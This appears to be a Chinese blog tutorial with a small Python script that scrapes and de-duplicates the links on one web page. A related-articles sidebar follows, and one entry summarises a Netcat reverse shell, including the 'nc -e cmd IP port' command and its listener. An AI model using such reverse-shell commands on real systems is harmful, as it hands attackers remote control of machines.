爬取网站的所有链接

简介: 爬取网站的所有链接

import urllib.request
import re

1. 确定好要爬取的入口链接

url = "http://pms3.ah.cmcc/"

2.根据需求构建好链接提取的正则表达式

pattern1 = '<.?(src=".?").*?'

3.模拟成浏览器并爬取对应的网页 谷歌浏览器

headers = {'User-Agent',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36'}
opener = urllib.request.build_opener()
opener.addheaders = [headers]
data = opener.open(url).read().decode('utf8')

4.根据2中规则提取出该网页中包含的链接

content_href = re.findall(pattern1, data, re.I)

print(content_href)

5.过滤掉重复的链接

# 列表转集合(去重) list1 = [6, 7, 7, 8, 8, 9] set(list1) {6, 7, 8, 9}

set1 = set(content_href)

6.后续操作,比如打印出来或者保存到文件中。

file_new = "D:\爬虫\href.txt"
with open(file_new, 'w') as f:
for i in set1:
f.write(i)
f.write("\n")

f.close()

print('已经生成文件')

目录
相关文章
|
10月前
|
存储 人工智能 Java
使用Spring AI调用AI模型
Spring AI是Spring框架的模块,支持人工智能和机器学习,提供简单易用的API集成主流AI服务(如OpenAI、Azure、百度千帆等)。其主要功能包括统一API接口、提示词工程、向量存储、文本嵌入与生成。核心概念涵盖AI Client、Prompt Template和Vector Store。通过添加依赖和配置API密钥,可快速对接Chat Model并使用Advisors API增强交互体验。此外,Spring AI Alibaba项目为阿里云通义模型提供了高层次API抽象,助力开发者构建AI应用。
1552 2
|
Shell Linux Windows
nc简单反弹shell
该内容描述了在Windows和Linux环境中使用`nc`(Netcat)工具建立反弹shell的过程。在Windows上,反弹端通过命令`nc -e cmd IP 端口`将控制权反弹到指定IP;控制端则运行`nc -lvvp 端口`等待连接。在Linux环境下,类似地,使用`nc -l -v -p 端口`作为控制端,而被控端用`nc 目标IP 端口`进行连接。文中还包含相关截图以辅助说明。
669 0
《使用「Markdown」编辑器的那些天 |CSDN编辑器测评》
《使用「Markdown」编辑器的那些天 |CSDN编辑器测评》
213 0
|
4月前
|
存储 SQL 人工智能
​​告别AI“纸上谈兵”?解锁LangGraph+OceanBase数据融合构建Agent蓝图
本文探讨企业级AI应用落地难题,分析为何许多AI项目上线后无人问津,指出核心在于真实业务需求复杂、数据割裂导致检索效率低下。文章提出通过构建融合AI数据底座,实现多模态数据统一存储与混合检索,并结合实战Demo展示如何提升AI应用效果,助力企业真正发挥AI的商业价值。
248 2
|
6月前
|
缓存 JSON 前端开发
第07课:Spring Boot集成Thymeleaf模板引擎
第07课:Spring Boot集成Thymeleaf模板引擎
602 0
第07课:Spring Boot集成Thymeleaf模板引擎
|
数据可视化 开发工具 git
如何解决 Git 版本控制系统中冲突的问题?
在Git版本控制系统中,冲突是指在合并或拉取操作时,两个或多个开发者对同一文件的同一部分进行了不同的修改,导致Git无法自动确定应该采用哪种修改。
590 154
|
物联网 测试技术 API
LLM 大模型学习必知必会系列(九):Agent微调最佳实践,用消费级显卡训练属于自己的Agent!
LLM 大模型学习必知必会系列(九):Agent微调最佳实践,用消费级显卡训练属于自己的Agent!
LLM 大模型学习必知必会系列(九):Agent微调最佳实践,用消费级显卡训练属于自己的Agent!
|
算法 数据库 Docker
大模型必备向量数据库-Milvus的安装过程
大模型必备向量数据库-Milvus的安装过程
2218 0
|
存储 人工智能 物联网
端侧设备AI代理优化框架问世,领域内准确率可达97%
【7月更文挑战第30天】新框架Octo-planner提升端侧AI代理效率与准确性至97%。此框架由Nexa AI等机构合作研发,采用&quot;Planner-Action&quot;模式,将AI代理任务划分为规划与执行两部分,利用&quot;Octopus&quot;及&quot;Phi-3 Mini&quot;模型分别处理。通过fine-tuning技术及GPT-4辅助,实现在资源受限设备上的高性能。更多细节见论文: https://arxiv.org/pdf/2406.18082
375 1